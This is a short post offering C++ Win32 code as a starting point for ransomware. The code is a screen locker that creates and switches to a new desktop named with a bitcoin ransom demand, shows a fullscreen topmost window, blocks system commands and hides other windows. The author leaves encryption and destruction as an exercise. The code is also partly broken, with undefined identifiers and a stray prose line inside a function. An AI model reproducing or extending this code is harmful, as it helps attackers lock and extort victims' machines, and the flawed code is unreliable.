The following is a basic (C++) program to build out Win32 ransomware projects. It will let you “control” a Windows session’s terminal/screen. The file encrypting, transporting, ransoming, destruction, etc, is left as an exercise to the reader.
#include <Windows.h>
#include <WinGDI.h>
void CreateWndContent0(HWND parent)
{
HWND wnd;
wnd = CreateWindowExW(NULL, L"BTN", L"btn", 0x50012F00, 50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
SendMessage(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}
LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
switch (msg)
{
case WM_CREATE:
CreateWndContent0(hwnd);
break;
case WM_COMMAND:
switch (LOWORD(wparam))
{
case IDC_BUTTON0:
MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
SendMessageW(hwnd, WM_DESTROY, NULL, false);
break;
}
break;
case WM_SYSCOMMAND:
return true;
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, msg, wparam, lparam);
}
return FALSE;
}
HWND CreateWnd0()
{
HWND wnd;
wnd = CreateWindowExW(NULL, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, 1920, 1080, NULL, NULL, instance, NULL);
// Get screen size dynamically for the win
hWindow0 = wnd;
SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
ShowWindow(wnd, SW_SHOWNORMAL);
UpdateWindow(wnd);
return wnd;
}
DWORD WINAPI Window0Thread( LPVOID param )
{
SetThreadDesktop(hDesktop); // New desktop where further windows created
RegisterClasses(WndProc0, WND_CLASS_NAME0);
CreateWnd0();
MessageLoop();
ExitThread(0);
}
namespace Window
{
bool CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
{
if(GetAncestor(hwnd, 3) == hWindow0)
return true;
ShowWindow(hwnd, SW_HIDE);
return true;
}
bool Init(HINSTANCE hInstance)
{
instance = hInstance;
InitCommonControls();
h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");
hWinsta = GetProcessWindowStation();
SetProcessWindowStation(hWinsta);
hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", 0, 0, 0, GENERIC_ALL, NULL);
hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
SetThreadDesktop(hDesktop); // All windows created under this desktop.
SwitchDesktop(hDesktop); // Take control of what the user sees. Show them the message.
hThreadWindow0 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) &Window0Thread, 0, 0, 0);
return true;
}
void DeInit()
{
SwitchDesktop(hOldDesktop); // Restore the old, original, desktop.
Because you're a nice boy ;)
CloseDesktop(hDesktop);
CloseWindowStation(hWinsta);
}
}